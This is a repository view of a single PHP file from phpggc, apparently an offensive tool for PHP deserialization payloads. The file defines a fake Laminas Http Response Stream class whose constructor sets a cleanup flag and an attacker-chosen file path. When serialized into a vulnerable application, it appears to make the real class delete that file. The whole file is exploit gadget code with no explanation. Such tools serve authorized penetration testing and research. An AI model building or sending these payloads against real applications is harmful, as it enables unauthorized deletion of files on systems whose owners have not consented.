Codebase list phpggc / 890f972 gadgetchains / Laminas / FD / 1 / gadgets.php
890f972

Tree @890f972 (Download .tar.gz)

gadgets.php @890f972raw · history · blame

<?php

namespace Laminas\Http\Response
{
    class Stream
    {
        function __construct($remote_path)
        {
            $this->cleanup = '1';
            $this->streamName = $remote_path;
        }
    }
}